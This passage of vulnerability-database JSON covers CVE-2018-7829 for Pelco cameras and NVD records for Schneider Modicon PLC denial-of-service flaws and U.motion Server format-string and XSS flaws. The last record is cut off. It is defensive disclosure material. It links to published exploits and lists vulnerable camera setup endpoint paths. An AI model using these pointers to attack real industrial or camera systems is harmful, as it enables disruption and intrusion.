"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16263"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-913"
},
{
"db": "NVD",
"id": "CVE-2018-7829"
}
]
},
"id": "VAR-201905-1041",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16263"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16263"
}
]
},
"last_update_date": "2024-11-23T21:39:29.272000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SEVD-2019-045-03",
"trust": 0.8,
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-045-03/"
},
{
"title": "SchneiderElectric1stGen.PelcoSarixEnhancedCamera and SpectraEnhancedPTZCamera Patch for any OS command execution vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/162749"
},
{
"title": "Schneider Electric 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=92891"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16263"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-913"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-943",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"db": "NVD",
"id": "CVE-2018-7829"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7829"
},
{
"trust": 0.9,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7829"
},
{
"trust": 0.7,
"url": "https://www.exploit-db.com/exploits/42307/"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42309/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070080"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143315"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129667"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070075"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143313"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129665"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7827"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/dot1x/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/system/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/events/handlers/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/snmp/update\""
},
{
"trust": 0.1,
"url": "https://www.pelco.com"
},
{
"trust": 0.1,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2017-5415.php"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16263"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-913"
},
{
"db": "NVD",
"id": "CVE-2018-7829"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16263"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-913"
},
{
"db": "NVD",
"id": "CVE-2018-7829"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16263"
},
{
"date": "2019-06-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"date": "2017-07-11T04:32:15",
"db": "PACKETSTORM",
"id": "143313"
},
{
"date": "2019-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-913"
},
{
"date": "2019-05-22T20:29:01.340000",
"db": "NVD",
"id": "CVE-2018-7829"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16263"
},
{
"date": "2019-06-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"date": "2019-05-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-913"
},
{
"date": "2024-11-21T04:12:48.690000",
"db": "NVD",
"id": "CVE-2018-7829"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-913"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Vulnerable to improper neutralization of special elements in data query logic",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-913"
}
],
"trust": 0.6
}
}
CVE-2019-6857 (GCVE-0-2019-6857)
Vulnerability from nvd – Published: 2020-01-06 22:57 – Updated: 2026-05-29 14:41- CWE-754 - Improper Check for Unusual or Exceptional Conditions
| URL | Tags |
|---|---|
| https://www.se.com/ww/en/download/document/SEVD-2… | x_refsource_CONFIRM |
| https://www.us-cert.gov/ics/advisories/icsa-20-016-01 | x_refsource_MISC |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions) |
Affected:
Modicon M580
Affected: Modicon M340 Affected: Modicon Quantum Affected: Modicon Premium (see security notification for specific versions) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:04.438Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-016-01"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2019-6857",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-29T14:39:16.673211Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-29T14:41:14.779Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions)",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "Modicon M580"
},
{
"status": "affected",
"version": "Modicon M340"
},
{
"status": "affected",
"version": "Modicon Quantum"
},
{
"status": "affected",
"version": "Modicon Premium (see security notification for specific versions)"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions) which could cause a Denial of Service of the controller when reading specific memory blocks using Modbus TCP."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-754",
"description": "CWE-754: Improper Check for Unusual or Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-21T23:03:43.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-016-01"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2019-6857",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions)",
"version": {
"version_data": [
{
"version_value": "Modicon M580"
},
{
"version_value": "Modicon M340"
},
{
"version_value": "Modicon Quantum"
},
{
"version_value": "Modicon Premium (see security notification for specific versions)"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions) which could cause a Denial of Service of the controller when reading specific memory blocks using Modbus TCP."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-754: Improper Check for Unusual or Exceptional Conditions"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01",
"refsource": "CONFIRM",
"url": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01"
},
{
"name": "https://www.us-cert.gov/ics/advisories/icsa-20-016-01",
"refsource": "MISC",
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-016-01"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2019-6857",
"datePublished": "2020-01-06T22:57:05.000Z",
"dateReserved": "2019-01-25T00:00:00.000Z",
"dateUpdated": "2026-05-29T14:41:14.779Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2019-6856 (GCVE-0-2019-6856)
Vulnerability from nvd – Published: 2020-01-06 22:57 – Updated: 2026-05-29 14:37- CWE-754 - Improper Check for Unusual or Exceptional Conditions
| URL | Tags |
|---|---|
| https://www.se.com/ww/en/download/document/SEVD-2… | x_refsource_CONFIRM |
| https://www.us-cert.gov/ics/advisories/icsa-20-016-01 | x_refsource_MISC |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions) |
Affected:
Modicon M580
Affected: Modicon M340 Affected: Modicon Quantum Affected: Modicon Premium (see security notification for specific versions) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:04.415Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-016-01"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2019-6856",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-29T14:36:59.205058Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-29T14:37:57.750Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions)",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "Modicon M580"
},
{
"status": "affected",
"version": "Modicon M340"
},
{
"status": "affected",
"version": "Modicon Quantum"
},
{
"status": "affected",
"version": "Modicon Premium (see security notification for specific versions)"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions) which could cause a Denial of Service when writing specific physical memory blocks using Modbus TCP."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-754",
"description": "CWE-754: Improper Check for Unusual or Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-21T23:04:36.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-016-01"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2019-6856",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions)",
"version": {
"version_data": [
{
"version_value": "Modicon M580"
},
{
"version_value": "Modicon M340"
},
{
"version_value": "Modicon Quantum"
},
{
"version_value": "Modicon Premium (see security notification for specific versions)"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions) which could cause a Denial of Service when writing specific physical memory blocks using Modbus TCP."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-754: Improper Check for Unusual or Exceptional Conditions"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01",
"refsource": "CONFIRM",
"url": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01"
},
{
"name": "https://www.us-cert.gov/ics/advisories/icsa-20-016-01",
"refsource": "MISC",
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-016-01"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2019-6856",
"datePublished": "2020-01-06T22:57:02.000Z",
"dateReserved": "2019-01-25T00:00:00.000Z",
"dateUpdated": "2026-05-29T14:37:57.750Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2018-7794 (GCVE-0-2018-7794)
Vulnerability from nvd – Published: 2020-01-06 22:57 – Updated: 2026-05-29 14:05- CWE-754 - Improper Check for Unusual or Exceptional Conditions
| URL | Tags |
|---|---|
| https://www.se.com/ww/en/download/document/SEVD-2… | x_refsource_CONFIRM |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions) |
Affected:
Modicon M580
Affected: Modicon M340 Affected: Modicon Quantum Affected: Modicon Premium (see security notification for specific versions) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T06:37:59.272Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2018-7794",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-29T14:04:08.954870Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-29T14:05:11.611Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions)",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "Modicon M580"
},
{
"status": "affected",
"version": "Modicon M340"
},
{
"status": "affected",
"version": "Modicon Quantum"
},
{
"status": "affected",
"version": "Modicon Premium (see security notification for specific versions)"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions) which could cause a Denial of Service when reading data with invalid index using Modbus TCP."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-754",
"description": "CWE-754: Improper Check for Unusual or Exceptional Conditions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-01-06T22:57:09.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2018-7794",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions)",
"version": {
"version_data": [
{
"version_value": "Modicon M580"
},
{
"version_value": "Modicon M340"
},
{
"version_value": "Modicon Quantum"
},
{
"version_value": "Modicon Premium (see security notification for specific versions)"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon Quantum, Modicon Premium (see security notification for specific versions) which could cause a Denial of Service when reading data with invalid index using Modbus TCP."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-754: Improper Check for Unusual or Exceptional Conditions"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01",
"refsource": "CONFIRM",
"url": "https://www.se.com/ww/en/download/document/SEVD-2019-344-01"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2018-7794",
"datePublished": "2020-01-06T22:57:09.000Z",
"dateReserved": "2018-03-08T00:00:00.000Z",
"dateUpdated": "2026-05-29T14:05:11.611Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2019-6840 (GCVE-0-2019-6840)
Vulnerability from nvd – Published: 2019-09-17 19:19 – Updated: 2024-08-04 20:31- CWE-134 - Format String: CWE-134
| URL | Tags |
|---|---|
| https://www.schneider-electric.com/ww/en/download… | x_refsource_CONFIRM |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | U.motion Server |
Affected:
MEG6501-0001 - U.motion KNX server
Affected: MEG6501-0002 - U.motion KNX Server Plus Affected: MEG6260-0410 - U.motion KNX Server Plus Affected: Touch 10 Affected: MEG6260-0415 - U.motion KNX Server Plus Affected: Touch 15 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:04.390Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-253-01"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "U.motion Server",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "MEG6501-0001 - U.motion KNX server"
},
{
"status": "affected",
"version": "MEG6501-0002 - U.motion KNX Server Plus"
},
{
"status": "affected",
"version": "MEG6260-0410 - U.motion KNX Server Plus"
},
{
"status": "affected",
"version": "Touch 10"
},
{
"status": "affected",
"version": "MEG6260-0415 - U.motion KNX Server Plus"
},
{
"status": "affected",
"version": "Touch 15"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A Format String: CWE-134 vulnerability exists in U.motion Server (MEG6501-0001 - U.motion KNX server, MEG6501-0002 - U.motion KNX Server Plus, MEG6260-0410 - U.motion KNX Server Plus, Touch 10, MEG6260-0415 - U.motion KNX Server Plus, Touch 15), which could allow an attacker to send a crafted message to the target server, thereby causing arbitrary commands to be executed."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-134",
"description": "Format String: CWE-134",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-09-17T19:19:36.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-253-01"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2019-6840",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "U.motion Server",
"version": {
"version_data": [
{
"version_value": "MEG6501-0001 - U.motion KNX server"
},
{
"version_value": "MEG6501-0002 - U.motion KNX Server Plus"
},
{
"version_value": "MEG6260-0410 - U.motion KNX Server Plus"
},
{
"version_value": "Touch 10"
},
{
"version_value": "MEG6260-0415 - U.motion KNX Server Plus"
},
{
"version_value": "Touch 15"
}
]
}
}
]
},
"vendor_name": "Schneider Electric SE"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A Format String: CWE-134 vulnerability exists in U.motion Server (MEG6501-0001 - U.motion KNX server, MEG6501-0002 - U.motion KNX Server Plus, MEG6260-0410 - U.motion KNX Server Plus, Touch 10, MEG6260-0415 - U.motion KNX Server Plus, Touch 15), which could allow an attacker to send a crafted message to the target server, thereby causing arbitrary commands to be executed."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Format String: CWE-134"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-253-01",
"refsource": "CONFIRM",
"url": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-253-01"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2019-6840",
"datePublished": "2019-09-17T19:19:36.000Z",
"dateReserved": "2019-01-25T00:00:00.000Z",
"dateUpdated": "2024-08-04T20:31:04.390Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-6835 (GCVE-0-2019-6835)
Vulnerability from nvd – Published: 2019-09-17 19:13 – Updated: 2024-08-04 20:31- CWE-79 - Cross-Site Scripting (XSS) CWE-79
| URL | Tags |
|---|---|
| https://www.schneider-electric.com/ww/en/download… | x_refsource_CONFIRM |
| Vendor | Product | Version | |
|---|---|---|---|
| Schneider Electric SE | U.motion Server |
Affected:
MEG6501-0001 - U.motion KNX server
Affected: MEG6501-0002 - U.motion KNX Server Plus Affected: MEG6260-0410 - U.motion KNX Server Plus Affected: Touch 10 Affected: MEG6260-0415 - U.motion KNX Server Plus Affected: Touch 15 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:31:04.391Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-253-01"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "U.motion Server",
"vendor": "Schneider Electric SE",
"versions": [
{
"status": "affected",
"version": "MEG6501-0001 - U.motion KNX server"
},
{
"status": "affected",
"version": "MEG6501-0002 - U.motion KNX Server Plus"
},
{
"status": "affected",
"version": "MEG6260-0410 - U.motion KNX Server Plus"
},
{
"status": "affected",
"version": "Touch 10"
},
{
"status": "affected",
"version": "MEG6260-0415 - U.motion KNX Server Plus"
},
{
"status": "affected",
"version": "Touch 15"
}
]
}
],
"descriptions": [
{
"lang": "en",
